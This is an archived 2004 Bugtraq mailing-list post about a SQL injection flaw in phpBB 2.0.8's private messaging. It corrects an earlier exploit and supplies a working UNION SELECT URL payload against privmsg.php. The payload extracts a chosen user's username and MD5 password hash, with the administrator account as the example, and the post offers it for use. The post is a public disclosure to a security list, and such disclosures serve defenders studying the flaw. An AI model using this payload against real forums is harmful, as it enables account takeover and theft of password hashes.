phpBB 2.0.8 Exploit
From: JeiAr (security_at_gulftech.org)
Date: 03/28/04
- Previous message: Tim Yamin: "[ GLSA 200403-05 ] Linux kernel do_mremap local privilege escalation vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 28 Mar 2004 18:59:05 -0000 To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is)
Hi guys,
After playing around with the private message SQL injection issue on a forum that I admin I noticed that the exploit code posted in the authors post doesn't work correctly. Here is why:
Both the TO and FROM fields hold the username and md5 hash in his exploit. The problem is each field only is able to hold 25 bytes at most (at least on the forums I tested it, they were all 2.0.8). Well, MD5 hash is 32 bytes, so you may get what looks like a valid hash @ first glance, but it doesn't work as it is an incomplete hash. Below is an example that stores the username in the SUBJECT of the PM and the MD5 hash in the BODY of the PM. It was tested on a few versions with working results. Of course the user_id=2 can be replaced with whatever user_id someone wants.
/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*
Hope this helps :)
JeiAr
- Previous message: Tim Yamin: "[ GLSA 200403-05 ] Linux kernel do_mremap local privilege escalation vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
